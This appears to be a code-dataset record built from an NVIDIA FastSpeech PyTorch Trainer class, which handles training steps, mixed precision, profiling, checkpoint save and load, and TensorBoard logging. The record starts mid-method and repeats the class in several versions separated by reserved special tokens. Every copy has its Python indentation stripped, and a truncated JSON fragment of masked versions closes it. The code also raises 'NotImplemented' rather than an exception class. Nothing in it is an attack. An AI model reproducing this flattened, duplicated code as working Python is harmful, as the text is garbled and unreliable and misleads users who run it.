state_dict = {'step': self.step, 'model': self.model.state_dict(),
'optim': self.optimizer.state_dict()}
torch.save(state_dict, self.ckpt_path + '/checkpoint_{:06d}.pt'.
format(self.step))
tprint('[Save] Model "{}". Step={}.'.format(self.model_name, self.step)
)
def load(self, load_optim=True):
files_exist = glob.glob(os.path.join(self.ckpt_path, '*'))
if files_exist:
latest_file = max(files_exist, key=os.path.getctime)
state_dict = torch.load(latest_file)
self.step = state_dict['step']
self.model.load_state_dict(state_dict['model'])
if load_optim:
self.optimizer.load_state_dict(state_dict['optim'])
tprint("[Load] Checkpoint '{}'. Step={}".format(latest_file,
self.step))
else:
tprint('No checkpoints in {}. Load skipped.'.format(self.ckpt_path)
)
def console_log(self, tag, loss, meta):
msg = 'loss: {:.6f}'.format(loss)
for key, value in meta.items():
msg += ',\t{}: {:.4f}'.format(key, value)
tprint(msg)
def tensorboard_log(self, tag, loss):
self.tbwriter.add_scalar('{}/loss'.format(tag), loss, global_step=
self.step)
@staticmethod
def repeat(iterable, n_repeat=None):
cnt = 0
while n_repeat is None or cnt < n_repeat:
for x in iterable:
yield x
cnt += 1
return StopIteration()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Trainer(object):
"""
set seed
set n_epochs, n_steps
save/load model
validation
logging
distributed
"""
def __init__(self, data_loader, model_name, model, optimizer_fn,
final_steps, lr_scheduler_fn=None, step=0, ckpt_path=None, log_path
=None, n_epochs=None, save_steps=None, log_steps=10, device='cuda',
use_amp=False, nvprof_iter_start=None, nvprof_iter_end=None,
pyprof_enabled=False, detect_anomaly=False, seed=None):
self.data_loader = data_loader
self.model_name = model_name
self.model = model
self.n_epochs = n_epochs
self.save_steps = save_steps
self.log_steps = log_steps
self.ckpt_path = ckpt_path
self.log_path = log_path
self.final_steps = final_steps
self.step = step
self.device = device
self.use_amp = use_amp
self.nvprof_iter_start = nvprof_iter_start
self.nvprof_iter_end = nvprof_iter_end
self.pyprof_enabled = pyprof_enabled
self.detect_anomaly = detect_anomaly
self.model.train()
to_device_async(self.model, self.device)
num_param = sum(param.numel() for param in model.parameters())
tprint('The number of {} parameters: {}'.format(self.model_name,
num_param))
self.optimizer = optimizer_fn(model)
if lr_scheduler_fn:
self.lr_scheduler = lr_scheduler_fn(self.optimizer)
else:
self.lr_scheduler = None
if self.use_amp:
from apex import amp
self.model, self.optimizer = amp.initialize(self.model, self.
optimizer, opt_level='O1')
if (nvprof_iter_start and nvprof_iter_end is not None and
pyprof_enabled):
from apex import pyprof
pyprof.nvtx.init()
self.model = nn.DataParallel(self.model)
if seed is None:
seed = np.random.randint(2 ** 16)
np.random.seed(seed)
torch.manual_seed(seed)
self.data_loader_iter = self.repeat(self.data_loader, n_epochs)
if log_path:
log_path = os.path.join(log_path, time.strftime('%Y%m%d-%H%M%S'))
self.tbwriter = SummaryWriter(log_dir=log_path, flush_secs=10)
if self.ckpt_path:
self.ckpt_path = os.path.join(self.ckpt_path, self.model_name)
pathlib.Path(self.ckpt_path).mkdir(parents=True, exist_ok=True)
self.load()
def train(self):
try:
with torch.autograd.profiler.emit_nvtx(enabled=self.pyprof_enabled
):
for i in range(self.step + 1, self.final_steps + 1):
self.step = i
tprint('------------- TRAIN step : {} -------------'.
format(i))
if self.nvprof_iter_start and i == self.nvprof_iter_start:
profiler.start()
timer = TimeElapsed(name=
'Training time during profiling', format=':.6f')
timer.start()
with Nvtx('step #{}'.format(self.step)):
loss, meta = self.do_step()
if self.nvprof_iter_end and i == self.nvprof_iter_end:
profiler.stop()
timer.end()
if self.lr_scheduler:
for param_group in self.optimizer.param_groups:
tprint('lr: {:06f}'.format(param_group['lr']))
self.lr_scheduler.step(self.step)
if self.step % self.log_steps == 0:
self.log(loss, meta)
if (self.ckpt_path and self.save_steps and i % self.
save_steps == 0):
self.save()
tprint('Training has been done.')
except StopIteration:
tprint('Training has been done. (by n_epochs)')
except KeyboardInterrupt:
tprint('Training has been canceled.')
@abc.abstractmethod
def loss(self, inputs, model):
raise NotImplemented
def do_step(self):
with Nvtx('data load', enabled=False):
data = next(self.data_loader_iter)
with torch.autograd.set_detect_anomaly(mode=self.detect_anomaly):
with Nvtx('forward'):
loss, meta = self.loss(data, self.model)
self.optimizer.zero_grad()
with Nvtx('backward'):
if self.use_amp:
from apex import amp
with amp.scale_loss(loss, self.optimizer) as scaled_loss:
scaled_loss.backward()
else:
loss.backward()
with Nvtx('weight update'):
self.optimizer.step()
return loss, meta
def log(self, loss, meta):
self.console_log('train', loss, meta)
if self.log_path:
self.tensorboard_log('train', loss)
def save(self):
state_dict = {'step': self.step, 'model': self.model.state_dict(),
'optim': self.optimizer.state_dict()}
torch.save(state_dict, self.ckpt_path + '/checkpoint_{:06d}.pt'.
format(self.step))
tprint('[Save] Model "{}". Step={}.'.format(self.model_name, self.step)
)
def load(self, load_optim=True):
files_exist = glob.glob(os.path.join(self.ckpt_path, '*'))
if files_exist:
latest_file = max(files_exist, key=os.path.getctime)
state_dict = torch.load(latest_file)
self.step = state_dict['step']
self.model.load_state_dict(state_dict['model'])
if load_optim:
self.optimizer.load_state_dict(state_dict['optim'])
tprint("[Load] Checkpoint '{}'. Step={}".format(latest_file,
self.step))
else:
tprint('No checkpoints in {}. Load skipped.'.format(self.ckpt_path)
)
def console_log(self, tag, loss, meta):
msg = 'loss: {:.6f}'.format(loss)
for key, value in meta.items():
msg += ',\t{}: {:.4f}'.format(key, value)
tprint(msg)
def tensorboard_log(self, tag, loss):
self.tbwriter.add_scalar('{}/loss'.format(tag), loss, global_step=
self.step)
@staticmethod
def repeat(iterable, n_repeat=None):
cnt = 0
while n_repeat is None or cnt < n_repeat:
for x in iterable:
yield x
cnt += 1
return StopIteration()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
plt.switch_backend('Agg')
class Trainer(object):
"""
set seed
set n_epochs, n_steps
save/load model
validation
logging
distributed
"""
def __init__(self, data_loader, model_name, model, optimizer_fn,
final_steps, lr_scheduler_fn=None, step=0, ckpt_path=None, log_path
=None, n_epochs=None, save_steps=None, log_steps=10, device='cuda',
use_amp=False, nvprof_iter_start=None, nvprof_iter_end=None,
pyprof_enabled=False, detect_anomaly=False, seed=None):
self.data_loader = data_loader
self.model_name = model_name
self.model = model
self.n_epochs = n_epochs
self.save_steps = save_steps
self.log_steps = log_steps
self.ckpt_path = ckpt_path
self.log_path = log_path
self.final_steps = final_steps
self.step = step
self.device = device
self.use_amp = use_amp
self.nvprof_iter_start = nvprof_iter_start
self.nvprof_iter_end = nvprof_iter_end
self.pyprof_enabled = pyprof_enabled
self.detect_anomaly = detect_anomaly
self.model.train()
to_device_async(self.model, self.device)
num_param = sum(param.numel() for param in model.parameters())
tprint('The number of {} parameters: {}'.format(self.model_name,
num_param))
self.optimizer = optimizer_fn(model)
if lr_scheduler_fn:
self.lr_scheduler = lr_scheduler_fn(self.optimizer)
else:
self.lr_scheduler = None
if self.use_amp:
from apex import amp
self.model, self.optimizer = amp.initialize(self.model, self.
optimizer, opt_level='O1')
if (nvprof_iter_start and nvprof_iter_end is not None and
pyprof_enabled):
from apex import pyprof
pyprof.nvtx.init()
self.model = nn.DataParallel(self.model)
if seed is None:
seed = np.random.randint(2 ** 16)
np.random.seed(seed)
torch.manual_seed(seed)
self.data_loader_iter = self.repeat(self.data_loader, n_epochs)
if log_path:
log_path = os.path.join(log_path, time.strftime('%Y%m%d-%H%M%S'))
self.tbwriter = SummaryWriter(log_dir=log_path, flush_secs=10)
if self.ckpt_path:
self.ckpt_path = os.path.join(self.ckpt_path, self.model_name)
pathlib.Path(self.ckpt_path).mkdir(parents=True, exist_ok=True)
self.load()
def train(self):
try:
with torch.autograd.profiler.emit_nvtx(enabled=self.pyprof_enabled
):
for i in range(self.step + 1, self.final_steps + 1):
self.step = i
tprint('------------- TRAIN step : {} -------------'.
format(i))
if self.nvprof_iter_start and i == self.nvprof_iter_start:
profiler.start()
timer = TimeElapsed(name=
'Training time during profiling', format=':.6f')
timer.start()
with Nvtx('step #{}'.format(self.step)):
loss, meta = self.do_step()
if self.nvprof_iter_end and i == self.nvprof_iter_end:
profiler.stop()
timer.end()
if self.lr_scheduler:
for param_group in self.optimizer.param_groups:
tprint('lr: {:06f}'.format(param_group['lr']))
self.lr_scheduler.step(self.step)
if self.step % self.log_steps == 0:
self.log(loss, meta)
if (self.ckpt_path and self.save_steps and i % self.
save_steps == 0):
self.save()
tprint('Training has been done.')
except StopIteration:
tprint('Training has been done. (by n_epochs)')
except KeyboardInterrupt:
tprint('Training has been canceled.')
@abc.abstractmethod
def loss(self, inputs, model):
raise NotImplemented
def do_step(self):
with Nvtx('data load', enabled=False):
data = next(self.data_loader_iter)
with torch.autograd.set_detect_anomaly(mode=self.detect_anomaly):
with Nvtx('forward'):
loss, meta = self.loss(data, self.model)
self.optimizer.zero_grad()
with Nvtx('backward'):
if self.use_amp:
from apex import amp
with amp.scale_loss(loss, self.optimizer) as scaled_loss:
scaled_loss.backward()
else:
loss.backward()
with Nvtx('weight update'):
self.optimizer.step()
return loss, meta
def log(self, loss, meta):
self.console_log('train', loss, meta)
if self.log_path:
self.tensorboard_log('train', loss)
def save(self):
state_dict = {'step': self.step, 'model': self.model.state_dict(),
'optim': self.optimizer.state_dict()}
torch.save(state_dict, self.ckpt_path + '/checkpoint_{:06d}.pt'.
format(self.step))
tprint('[Save] Model "{}". Step={}.'.format(self.model_name, self.step)
)
def load(self, load_optim=True):
files_exist = glob.glob(os.path.join(self.ckpt_path, '*'))
if files_exist:
latest_file = max(files_exist, key=os.path.getctime)
state_dict = torch.load(latest_file)
self.step = state_dict['step']
self.model.load_state_dict(state_dict['model'])
if load_optim:
self.optimizer.load_state_dict(state_dict['optim'])
tprint("[Load] Checkpoint '{}'. Step={}".format(latest_file,
self.step))
else:
tprint('No checkpoints in {}. Load skipped.'.format(self.ckpt_path)
)
def console_log(self, tag, loss, meta):
msg = 'loss: {:.6f}'.format(loss)
for key, value in meta.items():
msg += ',\t{}: {:.4f}'.format(key, value)
tprint(msg)
def tensorboard_log(self, tag, loss):
self.tbwriter.add_scalar('{}/loss'.format(tag), loss, global_step=
self.step)
@staticmethod
def repeat(iterable, n_repeat=None):
cnt = 0
while n_repeat is None or cnt < n_repeat:
for x in iterable:
yield x
cnt += 1
return StopIteration()
<|reserved_special_token_1|>
import abc
import glob
import pathlib
import numpy as np
import torch
from tensorboardX import SummaryWriter
import time
import os
import matplotlib.pyplot as plt
from torch import nn
from fastspeech.utils.logging import tprint
from fastspeech.utils.pytorch import to_device_async
from fastspeech.utils.nvtx import Nvtx
from fastspeech.utils.fp16 import cast_model_to_half
import torch.cuda.profiler as profiler
from fastspeech.utils.logging import tprint
from fastspeech.utils.time import TimeElapsed
plt.switch_backend('Agg')
class Trainer(object):
"""
set seed
set n_epochs, n_steps
save/load model
validation
logging
distributed
"""
def __init__(self, data_loader, model_name, model, optimizer_fn,
final_steps, lr_scheduler_fn=None, step=0, ckpt_path=None, log_path
=None, n_epochs=None, save_steps=None, log_steps=10, device='cuda',
use_amp=False, nvprof_iter_start=None, nvprof_iter_end=None,
pyprof_enabled=False, detect_anomaly=False, seed=None):
self.data_loader = data_loader
self.model_name = model_name
self.model = model
self.n_epochs = n_epochs
self.save_steps = save_steps
self.log_steps = log_steps
self.ckpt_path = ckpt_path
self.log_path = log_path
self.final_steps = final_steps
self.step = step
self.device = device
self.use_amp = use_amp
self.nvprof_iter_start = nvprof_iter_start
self.nvprof_iter_end = nvprof_iter_end
self.pyprof_enabled = pyprof_enabled
self.detect_anomaly = detect_anomaly
self.model.train()
to_device_async(self.model, self.device)
num_param = sum(param.numel() for param in model.parameters())
tprint('The number of {} parameters: {}'.format(self.model_name,
num_param))
self.optimizer = optimizer_fn(model)
if lr_scheduler_fn:
self.lr_scheduler = lr_scheduler_fn(self.optimizer)
else:
self.lr_scheduler = None
if self.use_amp:
from apex import amp
self.model, self.optimizer = amp.initialize(self.model, self.
optimizer, opt_level='O1')
if (nvprof_iter_start and nvprof_iter_end is not None and
pyprof_enabled):
from apex import pyprof
pyprof.nvtx.init()
self.model = nn.DataParallel(self.model)
if seed is None:
seed = np.random.randint(2 ** 16)
np.random.seed(seed)
torch.manual_seed(seed)
self.data_loader_iter = self.repeat(self.data_loader, n_epochs)
if log_path:
log_path = os.path.join(log_path, time.strftime('%Y%m%d-%H%M%S'))
self.tbwriter = SummaryWriter(log_dir=log_path, flush_secs=10)
if self.ckpt_path:
self.ckpt_path = os.path.join(self.ckpt_path, self.model_name)
pathlib.Path(self.ckpt_path).mkdir(parents=True, exist_ok=True)
self.load()
def train(self):
try:
with torch.autograd.profiler.emit_nvtx(enabled=self.pyprof_enabled
):
for i in range(self.step + 1, self.final_steps + 1):
self.step = i
tprint('------------- TRAIN step : {} -------------'.
format(i))
if self.nvprof_iter_start and i == self.nvprof_iter_start:
profiler.start()
timer = TimeElapsed(name=
'Training time during profiling', format=':.6f')
timer.start()
with Nvtx('step #{}'.format(self.step)):
loss, meta = self.do_step()
if self.nvprof_iter_end and i == self.nvprof_iter_end:
profiler.stop()
timer.end()
if self.lr_scheduler:
for param_group in self.optimizer.param_groups:
tprint('lr: {:06f}'.format(param_group['lr']))
self.lr_scheduler.step(self.step)
if self.step % self.log_steps == 0:
self.log(loss, meta)
if (self.ckpt_path and self.save_steps and i % self.
save_steps == 0):
self.save()
tprint('Training has been done.')
except StopIteration:
tprint('Training has been done. (by n_epochs)')
except KeyboardInterrupt:
tprint('Training has been canceled.')
@abc.abstractmethod
def loss(self, inputs, model):
raise NotImplemented
def do_step(self):
with Nvtx('data load', enabled=False):
data = next(self.data_loader_iter)
with torch.autograd.set_detect_anomaly(mode=self.detect_anomaly):
with Nvtx('forward'):
loss, meta = self.loss(data, self.model)
self.optimizer.zero_grad()
with Nvtx('backward'):
if self.use_amp:
from apex import amp
with amp.scale_loss(loss, self.optimizer) as scaled_loss:
scaled_loss.backward()
else:
loss.backward()
with Nvtx('weight update'):
self.optimizer.step()
return loss, meta
def log(self, loss, meta):
self.console_log('train', loss, meta)
if self.log_path:
self.tensorboard_log('train', loss)
def save(self):
state_dict = {'step': self.step, 'model': self.model.state_dict(),
'optim': self.optimizer.state_dict()}
torch.save(state_dict, self.ckpt_path + '/checkpoint_{:06d}.pt'.
format(self.step))
tprint('[Save] Model "{}". Step={}.'.format(self.model_name, self.step)
)
def load(self, load_optim=True):
files_exist = glob.glob(os.path.join(self.ckpt_path, '*'))
if files_exist:
latest_file = max(files_exist, key=os.path.getctime)
state_dict = torch.load(latest_file)
self.step = state_dict['step']
self.model.load_state_dict(state_dict['model'])
if load_optim:
self.optimizer.load_state_dict(state_dict['optim'])
tprint("[Load] Checkpoint '{}'. Step={}".format(latest_file,
self.step))
else:
tprint('No checkpoints in {}. Load skipped.'.format(self.ckpt_path)
)
def console_log(self, tag, loss, meta):
msg = 'loss: {:.6f}'.format(loss)
for key, value in meta.items():
msg += ',\t{}: {:.4f}'.format(key, value)
tprint(msg)
def tensorboard_log(self, tag, loss):
self.tbwriter.add_scalar('{}/loss'.format(tag), loss, global_step=
self.step)
@staticmethod
def repeat(iterable, n_repeat=None):
cnt = 0
while n_repeat is None or cnt < n_repeat:
for x in iterable:
yield x
cnt += 1
return StopIteration()
<|reserved_special_token_1|>
# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the NVIDIA CORPORATION nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL NVIDIA CORPORATION BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import abc
import glob
import pathlib
import numpy as np
import torch
from tensorboardX import SummaryWriter
import time
import os
import matplotlib.pyplot as plt
from torch import nn
from fastspeech.utils.logging import tprint
from fastspeech.utils.pytorch import to_device_async
from fastspeech.utils.nvtx import Nvtx
from fastspeech.utils.fp16 import cast_model_to_half
import torch.cuda.profiler as profiler
from fastspeech.utils.logging import tprint
from fastspeech.utils.time import TimeElapsed
plt.switch_backend('Agg')
class Trainer(object):
"""
set seed
set n_epochs, n_steps
save/load model
validation
logging
distributed
"""
def __init__(self, data_loader, model_name, model, optimizer_fn, final_steps, lr_scheduler_fn=None, step=0, ckpt_path=None, log_path=None, n_epochs=None, save_steps=None, log_steps=10, device='cuda', use_amp=False, nvprof_iter_start=None, nvprof_iter_end=None, pyprof_enabled=False, detect_anomaly=False, seed=None):
self.data_loader = data_loader
self.model_name = model_name
self.model = model
self.n_epochs = n_epochs
self.save_steps = save_steps
self.log_steps = log_steps
self.ckpt_path = ckpt_path
self.log_path = log_path
self.final_steps = final_steps
self.step = step
self.device = device
self.use_amp = use_amp
self.nvprof_iter_start = nvprof_iter_start
self.nvprof_iter_end = nvprof_iter_end
self.pyprof_enabled = pyprof_enabled
self.detect_anomaly = detect_anomaly
# model
self.model.train()
to_device_async(self.model, self.device)
num_param = sum(param.numel() for param in model.parameters())
tprint('The number of {} parameters: {}'.format(
self.model_name, num_param))
# optimizer
self.optimizer = optimizer_fn(model)
# lr scheduler
if lr_scheduler_fn:
self.lr_scheduler = lr_scheduler_fn(self.optimizer)
else:
self.lr_scheduler = None
# automatic mixed precision
if self.use_amp:
from apex import amp
self.model, self.optimizer = amp.initialize(self.model,
self.optimizer,
opt_level='O1')
# profile
if nvprof_iter_start and nvprof_iter_end is not None and pyprof_enabled:
from apex import pyprof
pyprof.nvtx.init()
# data parallel
self.model = nn.DataParallel(self.model)
# set seed
if seed is None:
seed = np.random.randint(2**16)
np.random.seed(seed)
torch.manual_seed(seed)
# data loader
self.data_loader_iter = self.repeat(self.data_loader, n_epochs)
# logging
if log_path:
# tensorboard log path : {log_path}/YYYYMMDD-HHMMMSS
log_path = os.path.join(log_path, time.strftime('%Y%m%d-%H%M%S'))
self.tbwriter = SummaryWriter(log_dir=log_path, flush_secs=10)
# checkpoint path
if self.ckpt_path:
self.ckpt_path = os.path.join(self.ckpt_path, self.model_name)
pathlib.Path(self.ckpt_path).mkdir(parents=True, exist_ok=True)
# load checkpoint
self.load()
def train(self):
try:
with torch.autograd.profiler.emit_nvtx(enabled=self.pyprof_enabled):
for i in range(self.step+1, self.final_steps + 1):
self.step = i
tprint("------------- TRAIN step : {} -------------".format(i))
if self.nvprof_iter_start and i == self.nvprof_iter_start:
profiler.start()
timer = TimeElapsed(name="Training time during profiling", format=":.6f")
timer.start()
with Nvtx("step #{}".format(self.step)):
loss, meta = self.do_step()
if self.nvprof_iter_end and i == self.nvprof_iter_end:
profiler.stop()
timer.end()
if self.lr_scheduler:
for param_group in self.optimizer.param_groups:
tprint("lr: {:06f}".format(param_group['lr']))
self.lr_scheduler.step(self.step)
if self.step % self.log_steps == 0:
self.log(loss, meta)
if self.ckpt_path and self.save_steps and i % self.save_steps == 0:
self.save()
tprint("Training has been done.")
except StopIteration: # done by n_epochs
tprint("Training has been done. (by n_epochs)")
except KeyboardInterrupt:
tprint("Training has been canceled.")
@abc.abstractmethod
def loss(self, inputs, model):
raise NotImplemented
def do_step(self):
with Nvtx("data load", enabled=False):
data = next(self.data_loader_iter)
with torch.autograd.set_detect_anomaly(mode=self.detect_anomaly):
with Nvtx("forward"):
loss, meta = self.loss(data, self.model)
self.optimizer.zero_grad()
with Nvtx("backward"):
if self.use_amp:
from apex import amp
with amp.scale_loss(loss, self.optimizer) as scaled_loss:
scaled_loss.backward()
else:
loss.backward()
with Nvtx("weight update"):
self.optimizer.step()
return loss, meta
def log(self, loss, meta):
self.console_log('train', loss, meta)
if self.log_path:
self.tensorboard_log('train', loss)
def save(self):
state_dict = {
'step': self.step,
'model': self.model.state_dict(),
'optim': self.optimizer.state_dict(),
}
torch.save(state_dict, self.ckpt_path +
'/checkpoint_{:06d}.pt'.format(self.step))
tprint('[Save] Model "{}". Step={}.'.format(
self.model_name, self.step))
def load(self, load_optim=True):
files_exist = glob.glob(os.path.join(self.ckpt_path, '*'))
if files_exist:
# load the latest created file.
latest_file = max(files_exist, key=os.path.getctime)
state_dict = torch.load(latest_file)
self.step = state_dict['step']
self.model.load_state_dict(state_dict['model'])
if load_optim:
self.optimizer.load_state_dict(state_dict['optim'])
tprint('[Load] Checkpoint \'{}\'. Step={}'.format(
latest_file, self.step))
else:
tprint('No checkpoints in {}. Load skipped.'.format(self.ckpt_path))
def console_log(self, tag, loss, meta):
# console logging
msg = 'loss: {:.6f}'.format(loss)
for key, value in meta.items():
msg += ',\t{}: {:.4f}'.format(key, value)
tprint(msg)
def tensorboard_log(self, tag, loss):
self.tbwriter.add_scalar(
'{}/loss'.format(tag), loss, global_step=self.step)
@staticmethod
def repeat(iterable, n_repeat=None):
cnt = 0
while n_repeat is None or cnt < n_repeat:
for x in iterable:
yield x
cnt += 1
return StopIteration()
|
flexible
|
{
"blob_id": "9fa534664056a8cf9e9a64ccc7d6dd4de2ec0936",
"index": 1514,
"step-1": "<mask token>\n\n\nclass Trainer(object):\n <mask token>\n\n def __init__(self, data_loader, model_name, model, optimizer_fn,\n final_steps, lr_scheduler_fn=None, step=0, ckpt_path=None, log_path\n =None, n_epochs=None, save_steps=None, log_steps=10, device='cuda',\n use_amp=False, nvprof_iter_start=None, nvprof_iter_end=None,\n pyprof_enabled=False, detect_anomaly=False, seed=None):\n self.data_loader = data_loader\n self.model_name = model_name\n self.model = model\n self.n_epochs = n_epochs\n self.save_steps = save_steps\n self.log_steps = log_steps\n self.ckpt_path = ckpt_path\n self.log_path = log_path\n self.final_steps = final_steps\n self.step = step\n self.device = device\n self.use_amp = use_amp\n self.nvprof_iter_start = nvprof_iter_start\n self.nvprof_iter_end = nvprof_iter_end\n self.pyprof_enabled = pyprof_enabled\n self.detect_anomaly = detect_anomaly\n self.model.train()\n to_device_async(self.model, self.device)\n num_param = sum(param.numel() for param in model.parameters())\n tprint('The number of {} parameters: {}'.format(self.model_name,\n num_param))\n self.optimizer = optimizer_fn(model)\n if lr_scheduler_fn:\n self.lr_scheduler = lr_scheduler_fn(self.optimizer)\n else:\n self.lr_scheduler = None\n if self.use_amp:\n from apex import amp\n self.model, self.optimizer = amp.initialize(self.model, self.\n optimizer, opt_level='O1')\n if (nvprof_iter_start and nvprof_iter_end is not None and\n pyprof_enabled):\n from apex import pyprof\n pyprof.nvtx.init()\n self.model = nn.DataParallel(self.model)\n if seed is None:\n seed = np.random.randint(2 ** 16)\n np.random.seed(seed)\n torch.manual_seed(seed)\n self.data_loader_iter = self.repeat(self.data_loader, n_epochs)\n if log_path:\n log_path = os.path.join(log_path, time.strftime('%Y%m%d-%H%M%S'))\n self.tbwriter = SummaryWriter(log_dir=log_path, flush_secs=10)\n if self.ckpt_path:\n self.ckpt_path = os.path.join(self.ckpt_path, self.model_name)\n pathlib.Path(self.ckpt_path).mkdir(parents=True, exist_ok=True)\n self.load()\n <mask token>\n\n @abc.abstractmethod\n def loss(self, inputs, model):\n raise NotImplemented\n <mask token>\n <mask token>\n\n def save(self):\n state_dict = {'step': self.step, 'model': self.model.state_dict(),\n 'optim': self.optimizer.state_dict()}\n torch.save(state_dict, self.ckpt_path + '/checkpoint_{:06d}.pt'.\n format(self.step))\n tprint('[Save] Model \"{}\". Step={}.'.format(self.model_name, self.step)\n )\n\n def load(self, load_optim=True):\n files_exist = glob.glob(os.path.join(self.ckpt_path, '*'))\n if files_exist:\n latest_file = max(files_exist, key=os.path.getctime)\n state_dict = torch.load(latest_file)\n self.step = state_dict['step']\n self.model.load_state_dict(state_dict['model'])\n if load_optim:\n self.optimizer.load_state_dict(state_dict['optim'])\n tprint(\"[Load] Checkpoint '{}'. Step={}\".format(latest_file,\n self.step))\n else:\n tprint('No checkpoints in {}. Load skipped.'.format(self.ckpt_path)\n )\n\n def console_log(self, tag, loss, meta):\n msg = 'loss: {:.6f}'.format(loss)\n for key, value in meta.items():\n msg += ',\\t{}: {:.4f}'.format(key, value)\n tprint(msg)\n\n def tensorboard_log(self, tag, loss):\n self.tbwriter.add_scalar('{}/loss'.format(tag), loss, global_step=\n self.step)\n\n @staticmethod\n def repeat(iterable, n_repeat=None):\n cnt = 0\n while n_repeat is None or cnt < n_repeat:\n for x in iterable:\n yield x\n cnt += 1\n return StopIteration()\n",
"step-2": "<mask token>\n\n\nclass Trainer(object):\n \"\"\"\n set seed\n set n_epochs, n_steps\n save/load model\n validation\n logging\n distributed\n \"\"\"\n\n def __init__(self, data_loader, model_name, model, optimizer_fn,\n final_steps, lr_scheduler_fn=None, step=0, ckpt_path=None, log_path\n =None, n_epochs=None, save_steps=None, log_steps=10, device='cuda',\n use_amp=False, nvprof_iter_start=None, nvprof_iter_end=None,\n pyprof_enabled=False, detect_anomaly=False, seed=None):\n self.data_loader = data_loader\n self.model_name = model_name\n self.model = model\n self.n_epochs = n_epochs\n self.save_steps = save_steps\n self.log_steps = log_steps\n self.ckpt_path = ckpt_path\n self.log_path = log_path\n self.final_steps = final_steps\n self.step = step\n self.device = device\n self.use_amp = use_amp\n self.nvprof_iter_start = nvprof_iter_start\n self.nvprof_iter_end = nvprof_iter_end\n self.pyprof_enabled = pyprof_enabled\n self.detect_anomaly = detect_anomaly\n self.model.train()\n to_device_async(self.model, self.device)\n num_param = sum(param.numel() for param in model.parameters())\n tprint('The number of {} parameters: {}'.format(self.model_name,\n num_param))\n self.optimizer = optimizer_fn(model)\n if lr_scheduler_fn:\n self.lr_scheduler = lr_scheduler_fn(self.optimizer)\n else:\n self.lr_scheduler = None\n if self.use_amp:\n from apex import amp\n self.model, self.optimizer = amp.initialize(self.model, self.\n optimizer, opt_level='O1')\n if (nvprof_iter_start and nvprof_iter_end is not None and\n pyprof_enabled):\n from apex import pyprof\n pyprof.nvtx.init()\n self.model = nn.DataParallel(self.model)\n if seed is None:\n seed = np.random.randint(2 ** 16)\n np.random.seed(seed)\n torch.manual_seed(seed)\n self.data_loader_iter = self.repeat(self.data_loader, n_epochs)\n if log_path:\n log_path = os.path.join(log_path, time.strftime('%Y%m%d-%H%M%S'))\n self.tbwriter = SummaryWriter(log_dir=log_path, flush_secs=10)\n if self.ckpt_path:\n self.ckpt_path = os.path.join(self.ckpt_path, self.model_name)\n pathlib.Path(self.ckpt_path).mkdir(parents=True, exist_ok=True)\n self.load()\n\n def train(self):\n try:\n with torch.autograd.profiler.emit_nvtx(enabled=self.pyprof_enabled\n ):\n for i in range(self.step + 1, self.final_steps + 1):\n self.step = i\n tprint('------------- TRAIN step : {} -------------'.\n format(i))\n if self.nvprof_iter_start and i == self.nvprof_iter_start:\n profiler.start()\n timer = TimeElapsed(name=\n 'Training time during profiling', format=':.6f')\n timer.start()\n with Nvtx('step #{}'.format(self.step)):\n loss, meta = self.do_step()\n if self.nvprof_iter_end and i == self.nvprof_iter_end:\n profiler.stop()\n timer.end()\n if self.lr_scheduler:\n for param_group in self.optimizer.param_groups:\n tprint('lr: {:06f}'.format(param_group['lr']))\n self.lr_scheduler.step(self.step)\n if self.step % self.log_steps == 0:\n self.log(loss, meta)\n if (self.ckpt_path and self.save_steps and i % self.\n save_steps == 0):\n self.save()\n tprint('Training has been done.')\n except StopIteration:\n tprint('Training has been done. (by n_epochs)')\n except KeyboardInterrupt:\n tprint('Training has been canceled.')\n\n @abc.abstractmethod\n def loss(self, inputs, model):\n raise NotImplemented\n\n def do_step(self):\n with Nvtx('data load', enabled=False):\n data = next(self.data_loader_iter)\n with torch.autograd.set_detect_anomaly(mode=self.detect_anomaly):\n with Nvtx('forward'):\n loss, meta = self.loss(data, self.model)\n self.optimizer.zero_grad()\n with Nvtx('backward'):\n if self.use_amp:\n from apex import amp\n with amp.scale_loss(loss, self.optimizer) as scaled_loss:\n scaled_loss.backward()\n else:\n loss.backward()\n with Nvtx('weight update'):\n self.optimizer.step()\n return loss, meta\n\n def log(self, loss, meta):\n self.console_log('train', loss, meta)\n if self.log_path:\n self.tensorboard_log('train', loss)\n\n def save(self):\n state_dict = {'step': self.step, 'model': self.model.state_dict(),\n 'optim': self.optimizer.state_dict()}\n torch.save(state_dict, self.ckpt_path + '/checkpoint_{:06d}.pt'.\n format(self.step))\n tprint('[Save] Model \"{}\". Step={}.'.format(self.model_name, self.step)\n )\n\n def load(self, load_optim=True):\n files_exist = glob.glob(os.path.join(self.ckpt_path, '*'))\n if files_exist:\n latest_file = max(files_exist, key=os.path.getctime)\n state_dict = torch.load(latest_file)\n self.step = state_dict['step']\n self.model.load_state_dict(state_dict['model'])\n if load_optim:\n self.optimizer.load_state_dict(state_dict['optim'])\n tprint(\"[Load] Checkpoint '{}'. Step={}\".format(latest_file,\n self.step))\n else:\n tprint('No checkpoints in 